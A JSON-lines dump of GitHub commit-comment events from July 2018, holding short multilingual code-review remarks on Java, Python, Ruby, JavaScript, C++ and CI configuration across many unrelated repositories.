{"id":"7910339414","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29575286,"position":7,"line":7,"path":"src/main/java/com/agurova/SummerPracticeProject/dal/contracts/IUserRepo.java","commit_id":"dd5c208d7cb9e7bd0ef4b2de258ecfb3692edaf6","created_at":"2018-07-03T05:32:14Z","updated_at":"2018-07-03T05:32:14Z","author_association":"COLLABORATOR","body":"Again code-style from .NET in Java?"}},"created_at":"2018-07-03T05:32:14Z"}
{"id":"7910340054","type":"CommitCommentEvent","actor":{"login":"CrosRoad95"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29575301,"position":null,"line":null,"path":null,"commit_id":"d28eb11fca544a57cb7906cc6bb55a50d7d55f78","created_at":"2018-07-03T05:32:28Z","updated_at":"2018-07-03T05:32:28Z","author_association":"CONTRIBUTOR","body":"this could collide with already existed methods.\r\nvehicle type isn't `getType` but `getVehicleType` so colshape type is `getShapeType`"}},"created_at":"2018-07-03T05:32:28Z"}
{"id":"7910340452","type":"CommitCommentEvent","actor":{"login":"calebsander"},"repo":{"name":"ASCIT/donut"},"payload":{"comment":{"id":29575315,"position":20,"line":54,"path":"donut/modules/flights/helpers.py","commit_id":"63138ba8910d60628b2242e0fd4f824f8a53cbae","created_at":"2018-07-03T05:32:36Z","updated_at":"2018-07-03T05:32:36Z","author_association":"MEMBER","body":"Also, it would be more efficient to make `ride_ids` a `set`, since that will give constant-time lookups"}},"created_at":"2018-07-03T05:32:36Z"}
{"id":"7910340540","type":"CommitCommentEvent","actor":{"login":"epplemint"},"repo":{"name":"epplemint/2018_HpIndex_Holt"},"payload":{"comment":{"id":29575318,"position":2,"line":3,"path":"epRp_/Post_JoinPNU.R","commit_id":"f01e5f5cd7944e64d811cee7f6c8eb3608467952","created_at":"2018-07-03T05:32:38Z","updated_at":"2018-07-03T05:32:38Z","author_association":"OWNER","body":"Comments"}},"created_at":"2018-07-03T05:32:38Z"}
{"id":"7910340609","type":"CommitCommentEvent","actor":{"login":"githubuserdlp"},"repo":{"name":"githubuserdlp/TEST"},"payload":{"comment":{"id":29575322,"position":null,"line":null,"path":null,"commit_id":"ca9076bc653865997690d0e94ce94f52fff90ba9","created_at":"2018-07-03T05:32:39Z","updated_at":"2018-07-03T05:32:39Z","author_association":"OWNER","body":"[f03072018110054_encrypt.txt](https://github.com/githubuserdlp/TEST/files/2157751/f03072018110054_encrypt.txt)\r\n"}},"created_at":"2018-07-03T05:32:39Z"}
{"id":"7910343821","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design-pro"},"payload":{"comment":{"id":29575383,"position":4,"line":10,"path":"src/index.ejs","commit_id":"67f686a262b51665d8a18558a3a9ae905ba6aa1b","created_at":"2018-07-03T05:33:53Z","updated_at":"2018-07-03T05:33:53Z","author_association":"MEMBER","body":"别引这个，速度在国内不行。"}},"created_at":"2018-07-03T05:33:53Z"}
{"id":"7910344917","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29575384,"position":9,"line":9,"path":"src/main/java/com/agurova/SummerPracticeProject/models/Image.java","commit_id":"dd5c208d7cb9e7bd0ef4b2de258ecfb3692edaf6","created_at":"2018-07-03T05:34:18Z","updated_at":"2018-07-03T05:34:18Z","author_association":"COLLABORATOR","body":"Я бы поменял Collection на что-то более конкретное, например на List или на Set (если нужно будет хранить уникальные элементы)."}},"created_at":"2018-07-03T05:34:18Z"}
{"id":"7910345093","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29575385,"position":10,"line":10,"path":"src/main/java/com/agurova/SummerPracticeProject/models/User.java","commit_id":"dd5c208d7cb9e7bd0ef4b2de258ecfb3692edaf6","created_at":"2018-07-03T05:34:22Z","updated_at":"2018-07-03T05:34:22Z","author_association":"COLLABORATOR","body":"Я бы поменял Collection на что-то более конкретное, например на List или на Set (если нужно будет хранить уникальные элементы)."}},"created_at":"2018-07-03T05:34:22Z"}
{"id":"7910347026","type":"CommitCommentEvent","actor":{"login":"joojis"},"repo":{"name":"CodeChain-io/codechain-sdk-js"},"payload":{"comment":{"id":29575389,"position":9,"line":13,"path":"API.md","commit_id":"9014cabaf562f0ca5198d07e8294d26a46c36e56","created_at":"2018-07-03T05:35:06Z","updated_at":"2018-07-03T05:35:06Z","author_association":"CONTRIBUTOR","body":"Remove this line"}},"created_at":"2018-07-03T05:35:06Z"}
{"id":"7910349500","type":"CommitCommentEvent","actor":{"login":"joojis"},"repo":{"name":"CodeChain-io/codechain-sdk-js"},"payload":{"comment":{"id":29575391,"position":3,"line":8,"path":"API.md","commit_id":"9014cabaf562f0ca5198d07e8294d26a46c36e56","created_at":"2018-07-03T05:35:56Z","updated_at":"2018-07-03T05:35:56Z","author_association":"CONTRIBUTOR","body":"Change PaymentTransaction to payment action"}},"created_at":"2018-07-03T05:35:56Z"}
{"id":"7910351663","type":"CommitCommentEvent","actor":{"login":"Sdaswani"},"repo":{"name":"mozilla-mobile/focus-ios"},"payload":{"comment":{"id":29575395,"position":5,"line":35,"path":"Blockzilla/Info.plist","commit_id":"a394cc67066a598e4fcd5c8f167b274d945a70cb","created_at":"2018-07-03T05:36:47Z","updated_at":"2018-07-03T05:36:47Z","author_association":"CONTRIBUTOR","body":"@sblatz looking at this, i think you have to up the version in a few others places, like for the content blocker plist and one more place."}},"created_at":"2018-07-03T05:36:47Z"}
{"id":"7910353557","type":"CommitCommentEvent","actor":{"login":"ktndwn"},"repo":{"name":"ktndwn/spaceXLaunchDatabase"},"payload":{"comment":{"id":29575400,"position":null,"line":null,"path":null,"commit_id":"54c4faf61bdbfc300976bee6aa50bfe68cf249c3","created_at":"2018-07-03T05:37:30Z","updated_at":"2018-07-03T05:37:30Z","author_association":"OWNER","body":"Fixed date temporarily, until I can figure out what I did wrong :("}},"created_at":"2018-07-03T05:37:30Z"}
{"id":"7910358392","type":"CommitCommentEvent","actor":{"login":"alexwelcing"},"repo":{"name":"alexwelcing/Telehealth-Final"},"payload":{"comment":{"id":29575407,"position":null,"line":null,"path":null,"commit_id":"fc889220097538c5ebf96abfafc4dd29db0dcbf9","created_at":"2018-07-03T05:39:18Z","updated_at":"2018-07-03T05:39:18Z","author_association":"OWNER","body":"revert"}},"created_at":"2018-07-03T05:39:18Z"}
{"id":"7910358926","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29575410,"position":4,"line":48,"path":"ticketing/templates/LoginPage.html","commit_id":"070815acc3c0f933516d63a7bf94c2786640224f","created_at":"2018-07-03T05:39:31Z","updated_at":"2018-07-03T05:39:31Z","author_association":"COLLABORATOR","body":"Delete this line"}},"created_at":"2018-07-03T05:39:31Z"}
{"id":"7910359309","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29575412,"position":4,"line":13,"path":"ticketing/views/Login.py","commit_id":"070815acc3c0f933516d63a7bf94c2786640224f","created_at":"2018-07-03T05:39:41Z","updated_at":"2018-07-03T05:39:41Z","author_association":"COLLABORATOR","body":"Delete this line"}},"created_at":"2018-07-03T05:39:41Z"}
{"id":"7910359629","type":"CommitCommentEvent","actor":{"login":"KaylaandPan"},"repo":{"name":"KaylaandPan/test2"},"payload":{"comment":{"id":29575414,"position":null,"line":null,"path":null,"commit_id":"bca4cd0471944a1793e334e0c7858011dc972c87","created_at":"2018-07-03T05:39:49Z","updated_at":"2018-07-03T05:39:49Z","author_association":"OWNER","body":"love"}},"created_at":"2018-07-03T05:39:49Z"}
{"id":"7910359969","type":"CommitCommentEvent","actor":{"login":"joojis"},"repo":{"name":"CodeChain-io/codechain-sdk-js"},"payload":{"comment":{"id":29575416,"position":15,"line":19,"path":"API.md","commit_id":"9014cabaf562f0ca5198d07e8294d26a46c36e56","created_at":"2018-07-03T05:39:57Z","updated_at":"2018-07-03T05:39:57Z","author_association":"CONTRIBUTOR","body":"Remove \"To read more ... click here\" until manual is ready"}},"created_at":"2018-07-03T05:39:57Z"}
{"id":"7910360478","type":"CommitCommentEvent","actor":{"login":"githubuserdlp"},"repo":{"name":"githubuserdlp/TEST"},"payload":{"comment":{"id":29575417,"position":null,"line":null,"path":null,"commit_id":"ca9076bc653865997690d0e94ce94f52fff90ba9","created_at":"2018-07-03T05:40:10Z","updated_at":"2018-07-03T05:40:10Z","author_association":"OWNER","body":"[f03072018110054_encrypt.txt](https://github.com/githubuserdlp/TEST/files/2157763/f03072018110054_encrypt.txt)\r\n"}},"created_at":"2018-07-03T05:40:10Z"}
{"id":"7910362899","type":"CommitCommentEvent","actor":{"login":"davisrayler"},"repo":{"name":"WemI0/BOTW_SaveConv"},"payload":{"comment":{"id":29575422,"position":null,"line":null,"path":null,"commit_id":"e2191be99644b138d02ee35e295998076055ca26","created_at":"2018-07-03T05:41:01Z","updated_at":"2018-07-03T05:41:01Z","author_association":"NONE","body":"Can you please make this work with more Wii U games? like Bayonetta 2 please."}},"created_at":"2018-07-03T05:41:01Z"}
{"id":"7910362952","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29575424,"position":null,"line":null,"path":null,"commit_id":"de3daacd3abf2c6c6a131e705aa23af0297d83dd","created_at":"2018-07-03T05:41:02Z","updated_at":"2018-07-03T05:41:02Z","author_association":"NONE","body":"Welcome back, V1 :) Congrats!"}},"created_at":"2018-07-03T05:41:02Z"}
{"id":"7910363177","type":"CommitCommentEvent","actor":{"login":"AndroiableDroid"},"repo":{"name":"ResurrectionRemix-Devices/android_device_wingtech_wt88047"},"payload":{"comment":{"id":29575426,"position":null,"line":null,"path":null,"commit_id":"6594229f7b11cad082b98c8ca2226fa340885dba","created_at":"2018-07-03T05:41:08Z","updated_at":"2018-07-03T05:41:08Z","author_association":"NONE","body":"Why you revert this commit what it will help"}},"created_at":"2018-07-03T05:41:08Z"}
{"id":"7910364258","type":"CommitCommentEvent","actor":{"login":"apeschar"},"repo":{"name":"kiboit/phast"},"payload":{"comment":{"id":29575427,"position":null,"line":null,"path":null,"commit_id":"246ecf5183e67764bbad882db71328338293aed0","created_at":"2018-07-03T05:41:32Z","updated_at":"2018-07-03T05:41:32Z","author_association":"MEMBER","body":"@mkosturkov Doesn't `class_exists(Requests::class)` always return true, because you've included Requests in `composer.json`? Seems to me there's no reason for that if() and we should just drop the loading of WordPress's Requests library in the PhastPress service."}},"created_at":"2018-07-03T05:41:32Z"}
{"id":"7910364721","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29575428,"position":6,"line":11,"path":"ticketing/views/ActiveTicket.py","commit_id":"de7ec9a6226dbb3d1a1a6ea078eb4bd975ad1e71","created_at":"2018-07-03T05:41:44Z","updated_at":"2018-07-03T05:41:44Z","author_association":"COLLABORATOR","body":"you don't need to cast the value 1 to a string, you can leave it as an integer 1"}},"created_at":"2018-07-03T05:41:44Z"}
{"id":"7910366375","type":"CommitCommentEvent","actor":{"login":"alexwelcing"},"repo":{"name":"alexwelcing/Telehealth-Final"},"payload":{"comment":{"id":29575432,"position":null,"line":null,"path":null,"commit_id":"36115c41d39e6bfb6edd088111407bcc127a2151","created_at":"2018-07-03T05:42:20Z","updated_at":"2018-07-03T05:42:20Z","author_association":"OWNER","body":"Adding from Toshiba."}},"created_at":"2018-07-03T05:42:20Z"}
{"id":"7910366539","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29575433,"position":6,"line":11,"path":"ticketing/views/AllTicket.py","commit_id":"de7ec9a6226dbb3d1a1a6ea078eb4bd975ad1e71","created_at":"2018-07-03T05:42:24Z","updated_at":"2018-07-03T05:42:24Z","author_association":"COLLABORATOR","body":"same as above, do this for this whole file"}},"created_at":"2018-07-03T05:42:24Z"}
{"id":"7910369526","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29575440,"position":16,"line":16,"path":"ticketing/views/Login.py","commit_id":"de7ec9a6226dbb3d1a1a6ea078eb4bd975ad1e71","created_at":"2018-07-03T05:43:30Z","updated_at":"2018-07-03T05:43:30Z","author_association":"COLLABORATOR","body":"From this line onwards, you have some spacing issues. You need to make sure these are tabbed correctly or else python will have an issue with it"}},"created_at":"2018-07-03T05:43:30Z"}
{"id":"7910373440","type":"CommitCommentEvent","actor":{"login":"NelsonBlakeN"},"repo":{"name":"NelsonBlakeN/CryptoInAction"},"payload":{"comment":{"id":29575447,"position":null,"line":null,"path":null,"commit_id":"9053337cf1fe3feb4e643e9c7efac223faa7f648","created_at":"2018-07-03T05:44:56Z","updated_at":"2018-07-03T05:44:56Z","author_association":"OWNER","body":"I made these separate scripts because it was tricky to do it all together. I could have tried forking each process, but then I wasn't sure if there would be problems with the client failing to connect before the server starts. Also outputs would get mixed up in the same tab. Finally, there could be usefulness with a separate server if there are two clients running."}},"created_at":"2018-07-03T05:44:56Z"}
{"id":"7910377417","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29575462,"position":13,"line":200,"path":"1-Osnovy-Ruby-polnaya-PO/lesson4/interface.rb","commit_id":"bc47bfc52f811038ebf6e3a37f94a823eed21608","created_at":"2018-07-03T05:46:24Z","updated_at":"2018-07-03T05:46:24Z","author_association":"OWNER","body":"ya hotel vytashit vse vagony iz poezda"}},"created_at":"2018-07-03T05:46:24Z"}
{"id":"7910380836","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29575471,"position":null,"line":null,"path":null,"commit_id":"d4ccbb0f860ce5e0dce206703618ea75967aec47","created_at":"2018-07-03T05:47:42Z","updated_at":"2018-07-03T05:47:42Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 677](https://travis-ci.org/per1234/arduino-ci-script/builds/399432520) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00677-001-tsv"}},"created_at":"2018-07-03T05:47:42Z"}
{"id":"7910381055","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29575474,"position":null,"line":null,"path":null,"commit_id":"d4ccbb0f860ce5e0dce206703618ea75967aec47","created_at":"2018-07-03T05:47:47Z","updated_at":"2018-07-03T05:47:47Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 677](https://travis-ci.org/per1234/arduino-ci-script/builds/399432520) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00677"}},"created_at":"2018-07-03T05:47:47Z"}
{"id":"7910382689","type":"CommitCommentEvent","actor":{"login":"zaloun"},"repo":{"name":"zaloun/zaloun"},"payload":{"comment":{"id":29575480,"position":6,"line":4,"path":"README.md","commit_id":"a87402b8ac53e8eeb7a933d480860068c8dde432","created_at":"2018-07-03T05:48:24Z","updated_at":"2018-07-03T05:48:24Z","author_association":"OWNER","body":"Da"}},"created_at":"2018-07-03T05:48:24Z"}
{"id":"7910393684","type":"CommitCommentEvent","actor":{"login":"joojis"},"repo":{"name":"CodeChain-io/codechain-sdk-js"},"payload":{"comment":{"id":29575506,"position":52,"line":50,"path":"API.md","commit_id":"9014cabaf562f0ca5198d07e8294d26a46c36e56","created_at":"2018-07-03T05:52:24Z","updated_at":"2018-07-03T05:52:24Z","author_association":"CONTRIBUTOR","body":"Remove \""}},"created_at":"2018-07-03T05:52:24Z"}
{"id":"7910396434","type":"CommitCommentEvent","actor":{"login":"joojis"},"repo":{"name":"CodeChain-io/codechain-sdk-js"},"payload":{"comment":{"id":29575511,"position":54,"line":52,"path":"API.md","commit_id":"9014cabaf562f0ca5198d07e8294d26a46c36e56","created_at":"2018-07-03T05:53:26Z","updated_at":"2018-07-03T05:53:26Z","author_association":"CONTRIBUTOR","body":"Remove \"using ...Transaction\""}},"created_at":"2018-07-03T05:53:26Z"}
{"id":"7910401017","type":"CommitCommentEvent","actor":{"login":"dsebastien"},"repo":{"name":"dsebastien/stark"},"payload":{"comment":{"id":29575525,"position":4,"line":24,"path":"packages/stark-build/package.json","commit_id":"9bd4c5c9462c0262539bf96ae474e6e937e8f03a","created_at":"2018-07-03T05:54:57Z","updated_at":"2018-07-03T05:54:57Z","author_association":"OWNER","body":"I don't think the hmr module is needed in stark-build, but I'm not sure?"}},"created_at":"2018-07-03T05:54:57Z"}
{"id":"7910408435","type":"CommitCommentEvent","actor":{"login":"dsebastien"},"repo":{"name":"dsebastien/stark"},"payload":{"comment":{"id":29575537,"position":67,"line":21,"path":"showcase/src/main.browser.ts","commit_id":"9bd4c5c9462c0262539bf96ae474e6e937e8f03a","created_at":"2018-07-03T05:57:36Z","updated_at":"2018-07-03T05:57:36Z","author_association":"OWNER","body":"My idea here is that the decoration of the module is part of stark: we decide of the main things to adapt for dev and prod.\r\nAlthough projects still can choose not to use that and also override the behavior themselves.\r\n\r\nQuestion is: should we keep the \"decorateModule\" method in StarkEnvironment?\r\nI don't really like the name as it's a bit misleading"}},"created_at":"2018-07-03T05:57:36Z"}
{"id":"7910408852","type":"CommitCommentEvent","actor":{"login":"rvandelzen"},"repo":{"name":"ebsco/edsapi-simple-php-sample"},"payload":{"comment":{"id":29575540,"position":null,"line":null,"path":null,"commit_id":"492b894b727305b6b66f87786069056229f9d37f","created_at":"2018-07-03T05:57:45Z","updated_at":"2018-07-03T05:57:45Z","author_association":"NONE","body":"@cwolfebsco \r\nI have tested and it works wonderful.\r\nRob"}},"created_at":"2018-07-03T05:57:45Z"}
{"id":"7910409796","type":"CommitCommentEvent","actor":{"login":"dsebastien"},"repo":{"name":"dsebastien/stark"},"payload":{"comment":{"id":29575544,"position":16,"line":22,"path":"starter/src/environments/environment.ts","commit_id":"9bd4c5c9462c0262539bf96ae474e6e937e8f03a","created_at":"2018-07-03T05:58:07Z","updated_at":"2018-07-03T05:58:07Z","author_association":"OWNER","body":"One benefit of moving that code to Stark is that we can avoid a lot of code duplication and maintenance across apps"}},"created_at":"2018-07-03T05:58:07Z"}
{"id":"7910410838","type":"CommitCommentEvent","actor":{"login":"dsebastien"},"repo":{"name":"dsebastien/stark"},"payload":{"comment":{"id":29575547,"position":7,"line":5,"path":"showcase/src/environments/environment.e2e.prod.ts","commit_id":"9bd4c5c9462c0262539bf96ae474e6e937e8f03a","created_at":"2018-07-03T05:58:28Z","updated_at":"2018-07-03T05:58:28Z","author_association":"OWNER","body":"Actually this should also be moved to stark"}},"created_at":"2018-07-03T05:58:28Z"}
{"id":"7910411651","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":29575549,"position":null,"line":null,"path":null,"commit_id":"02c24f59ef33bf151acf1eb7d8796997053b95fa","created_at":"2018-07-03T05:58:45Z","updated_at":"2018-07-03T05:58:45Z","author_association":"MEMBER","body":"@UniversalMediaServer/developers the website is down, looking into it"}},"created_at":"2018-07-03T05:58:45Z"}
{"id":"7910412068","type":"CommitCommentEvent","actor":{"login":"cowardice"},"repo":{"name":"cowardice/nio"},"payload":{"comment":{"id":29575551,"position":null,"line":null,"path":null,"commit_id":"30099aac9d379ac3b8299e15bf41035ca7f66f4c","created_at":"2018-07-03T05:58:56Z","updated_at":"2018-07-03T05:58:56Z","author_association":"OWNER","body":"springboot+dubbo"}},"created_at":"2018-07-03T05:58:56Z"}
{"id":"7910414123","type":"CommitCommentEvent","actor":{"login":"HariprasathPanneerselvam"},"repo":{"name":"logaNaNa/sample-Angular-Js"},"payload":{"comment":{"id":29575556,"position":2,"line":2,"path":"index.php","commit_id":"8d896df45eeb72e49f9c062311ff76412d1f8d45","created_at":"2018-07-03T05:59:41Z","updated_at":"2018-07-03T05:59:41Z","author_association":"NONE","body":"echo \"Loganathan Balaraman\";"}},"created_at":"2018-07-03T05:59:41Z"}
{"id":"7910416911","type":"CommitCommentEvent","actor":{"login":"AurelioSilver"},"repo":{"name":"AurelioSilver/pillarsofeternity-2-german-patch"},"payload":{"comment":{"id":29575570,"position":null,"line":null,"path":null,"commit_id":"ea2d42b2254981f424f4e726e7501e7abb05de08","created_at":"2018-07-03T06:00:34Z","updated_at":"2018-07-03T06:00:34Z","author_association":"OWNER","body":"Ich muss mal schauen, ob das nicht zu lang ist. Es sind die Überschriften von einem relativ schmalen Fenster, wo dann die Namen der verletzten Besatzungsmitglieder angezeigt werden."}},"created_at":"2018-07-03T06:00:34Z"}
{"id":"7910423720","type":"CommitCommentEvent","actor":{"login":"githubuserdlp"},"repo":{"name":"githubuserdlp/TEST"},"payload":{"comment":{"id":29575606,"position":null,"line":null,"path":null,"commit_id":"ca9076bc653865997690d0e94ce94f52fff90ba9","created_at":"2018-07-03T06:02:53Z","updated_at":"2018-07-03T06:02:53Z","author_association":"OWNER","body":"\r\n[downloadcustmess.txt](https://github.com/githubuserdlp/TEST/files/2157821/downloadcustmess.txt)\r\n"}},"created_at":"2018-07-03T06:02:53Z"}
{"id":"7910427310","type":"CommitCommentEvent","actor":{"login":"guojiangkun"},"repo":{"name":"guojiangkun/kun"},"payload":{"comment":{"id":29575610,"position":null,"line":null,"path":null,"commit_id":"ca594160a99e0f4cd9b92b2c04054906e633caf3","created_at":"2018-07-03T06:04:05Z","updated_at":"2018-07-03T06:04:05Z","author_association":"OWNER","body":"ghbg"}},"created_at":"2018-07-03T06:04:05Z"}
{"id":"7910431120","type":"CommitCommentEvent","actor":{"login":"wefbnkop"},"repo":{"name":"wefbnkop/junhui"},"payload":{"comment":{"id":29575620,"position":4,"line":4,"path":".gitignore/.gitignore","commit_id":"09836ed2e3ffe42acc6b27e846b396ad4e2e7791","created_at":"2018-07-03T06:05:21Z","updated_at":"2018-07-03T06:05:21Z","author_association":"OWNER","body":"ghn "}},"created_at":"2018-07-03T06:05:21Z"}
{"id":"7910431298","type":"CommitCommentEvent","actor":{"login":"Haxified1"},"repo":{"name":"RONTheCookie/discordboats.club"},"payload":{"comment":{"id":29575621,"position":null,"line":null,"path":null,"commit_id":"8d443d04a93ce32080c38026edebf69a9b5b01b7","created_at":"2018-07-03T06:05:25Z","updated_at":"2018-07-03T06:05:25Z","author_association":"NONE","body":"how do you even make this mistake lol?"}},"created_at":"2018-07-03T06:05:25Z"}
{"id":"7910433105","type":"CommitCommentEvent","actor":{"login":"wefbnkop"},"repo":{"name":"wefbnkop/junhui"},"payload":{"comment":{"id":29575626,"position":1,"line":1,"path":".gitignore/.gitignore","commit_id":"09836ed2e3ffe42acc6b27e846b396ad4e2e7791","created_at":"2018-07-03T06:05:59Z","updated_at":"2018-07-03T06:05:59Z","author_association":"OWNER","body":"<div>水电费第三方</div>"}},"created_at":"2018-07-03T06:05:59Z"}
{"id":"7910433809","type":"CommitCommentEvent","actor":{"login":"yuq"},"repo":{"name":"harishkrupo/external-mesa"},"payload":{"comment":{"id":29575628,"position":28,"line":481,"path":"include/GL/internal/dri_interface.h","commit_id":"0753dfc182ed214c4c1b2b0695b73078664fc618","created_at":"2018-07-03T06:06:12Z","updated_at":"2018-07-03T06:06:12Z","author_association":"NONE","body":"where's this timeout param?"}},"created_at":"2018-07-03T06:06:12Z"}
{"id":"7910435415","type":"CommitCommentEvent","actor":{"login":"guojiangkun"},"repo":{"name":"guojiangkun/kun"},"payload":{"comment":{"id":29575630,"position":null,"line":null,"path":null,"commit_id":"ca594160a99e0f4cd9b92b2c04054906e633caf3","created_at":"2018-07-03T06:06:44Z","updated_at":"2018-07-03T06:06:44Z","author_association":"OWNER","body":"gthy"}},"created_at":"2018-07-03T06:06:44Z"}
{"id":"7910438507","type":"CommitCommentEvent","actor":{"login":"harishkrupo"},"repo":{"name":"harishkrupo/external-mesa"},"payload":{"comment":{"id":29575641,"position":28,"line":481,"path":"include/GL/internal/dri_interface.h","commit_id":"0753dfc182ed214c4c1b2b0695b73078664fc618","created_at":"2018-07-03T06:07:47Z","updated_at":"2018-07-03T06:07:47Z","author_association":"OWNER","body":"Sorry, this was copied from the fence extension :)\r\nstill RFC. Will fix this. Thanks!"}},"created_at":"2018-07-03T06:07:47Z"}
{"id":"7910441242","type":"CommitCommentEvent","actor":{"login":"hanabi1224"},"repo":{"name":"hanabi1224/CommandLine"},"payload":{"comment":{"id":29575650,"position":null,"line":null,"path":null,"commit_id":"dd4f87eef25aae9e9ff21a2783299093e144aa0b","created_at":"2018-07-03T06:08:42Z","updated_at":"2018-07-03T06:08:42Z","author_association":"OWNER","body":"@AlexGhiondea  This changes breaks tests and code coverage in CI"}},"created_at":"2018-07-03T06:08:42Z"}
{"id":"7910443078","type":"CommitCommentEvent","actor":{"login":"Tiogaplanet"},"repo":{"name":"Tiogaplanet/MiP_ProMini-Pack"},"payload":{"comment":{"id":29575655,"position":26,"line":491,"path":"Arduino/MiP_ProMini_Pack_Library/src/mip.h","commit_id":"7fc41f6923bbeff6da944f54669237e9327d1fd1","created_at":"2018-07-03T06:09:20Z","updated_at":"2018-07-03T06:09:20Z","author_association":"OWNER","body":"OK, that one's obvious.  Will fix."}},"created_at":"2018-07-03T06:09:20Z"}
{"id":"7910444307","type":"CommitCommentEvent","actor":{"login":"AlexGhiondea"},"repo":{"name":"hanabi1224/CommandLine"},"payload":{"comment":{"id":29575657,"position":null,"line":null,"path":null,"commit_id":"dd4f87eef25aae9e9ff21a2783299093e144aa0b","created_at":"2018-07-03T06:09:44Z","updated_at":"2018-07-03T06:09:44Z","author_association":"NONE","body":"Yes -- you are right. I am working on fixing this now. It looks like AppVeyor and the code coverage tools want to run net462."}},"created_at":"2018-07-03T06:09:44Z"}
{"id":"7910444731","type":"CommitCommentEvent","actor":{"login":"anuragmahanta"},"repo":{"name":"anuragmahanta/firefly"},"payload":{"comment":{"id":29575659,"position":2,"line":2,"path":"README.md","commit_id":"df3357c4509513aab29cb5dcda3068fe70112266","created_at":"2018-07-03T06:09:53Z","updated_at":"2018-07-03T06:09:53Z","author_association":"OWNER","body":"lmsensors.sh is a bash script , that will send mail to SysAdmin when there is a rise in temperature in Server .\r\n\r\nI have implemented it in Fedora  24 (x86_64)  "}},"created_at":"2018-07-03T06:09:53Z"}
{"id":"7910446851","type":"CommitCommentEvent","actor":{"login":"tanacchi"},"repo":{"name":"SosysPBL2018/hello_idea"},"payload":{"comment":{"id":29575662,"position":11,"line":28,"path":"app/controllers/ideas_controller.rb","commit_id":"278cd86293ea7685c2521cc4c6452491ba82c9ac","created_at":"2018-07-03T06:10:34Z","updated_at":"2018-07-03T06:10:34Z","author_association":"CONTRIBUTOR","body":"`idea_path` か `topic_path(:id @idea.topic)` じゃダメだったの？"}},"created_at":"2018-07-03T06:10:34Z"}
{"id":"7910447292","type":"CommitCommentEvent","actor":{"login":"hanabi1224"},"repo":{"name":"AlexGhiondea/CommandLine"},"payload":{"comment":{"id":29575664,"position":null,"line":null,"path":null,"commit_id":"dd4f87eef25aae9e9ff21a2783299093e144aa0b","created_at":"2018-07-03T06:10:42Z","updated_at":"2018-07-03T06:10:42Z","author_association":"CONTRIBUTOR","body":"@AlexGhiondea  without net462,  UT and code coverage are not working in appveyor CI"}},"created_at":"2018-07-03T06:10:42Z"}
{"id":"7910449255","type":"CommitCommentEvent","actor":{"login":"AlexGhiondea"},"repo":{"name":"AlexGhiondea/CommandLine"},"payload":{"comment":{"id":29575674,"position":null,"line":null,"path":null,"commit_id":"dd4f87eef25aae9e9ff21a2783299093e144aa0b","created_at":"2018-07-03T06:11:22Z","updated_at":"2018-07-03T06:11:22Z","author_association":"OWNER","body":"Yes -- trying to figure out why.."}},"created_at":"2018-07-03T06:11:22Z"}
{"id":"7910449340","type":"CommitCommentEvent","actor":{"login":"tanacchi"},"repo":{"name":"SosysPBL2018/hello_idea"},"payload":{"comment":{"id":29575675,"position":20,"line":37,"path":"app/controllers/ideas_controller.rb","commit_id":"278cd86293ea7685c2521cc4c6452491ba82c9ac","created_at":"2018-07-03T06:11:24Z","updated_at":"2018-07-03T06:11:24Z","author_association":"CONTRIBUTOR","body":"知ってるとは思うけど\r\n`topics_path` と `topic_path` は全然違うからね"}},"created_at":"2018-07-03T06:11:24Z"}
{"id":"7910451512","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29575678,"position":24,"line":23,"path":"src/main/java/com/otus/spring/Main.java","commit_id":"c9ba487a4fd533d8dba6d7908730d4f6cb6fd9ea","created_at":"2018-07-03T06:12:06Z","updated_at":"2018-07-03T06:12:06Z","author_association":"NONE","body":"`@Value(\"${message.filename}\") String bundleFilename` тогда уж) Лучше давать однозначное имя, особенно для свойств - они обычно вне кода редактируются."}},"created_at":"2018-07-03T06:12:06Z"}
{"id":"7910451758","type":"CommitCommentEvent","actor":{"login":"caopeng428"},"repo":{"name":"ray-project/ray"},"payload":{"comment":{"id":29575679,"position":20,"line":32,"path":"src/ray/object_manager/object_buffer_pool.cc","commit_id":"60bc3a014f0d289f748acf670ff4202cd4d06730","created_at":"2018-07-03T06:12:10Z","updated_at":"2018-07-03T06:12:10Z","author_association":"CONTRIBUTOR","body":"return (data_size + max_chunks_ - 1) / max_chunks_;"}},"created_at":"2018-07-03T06:12:10Z"}
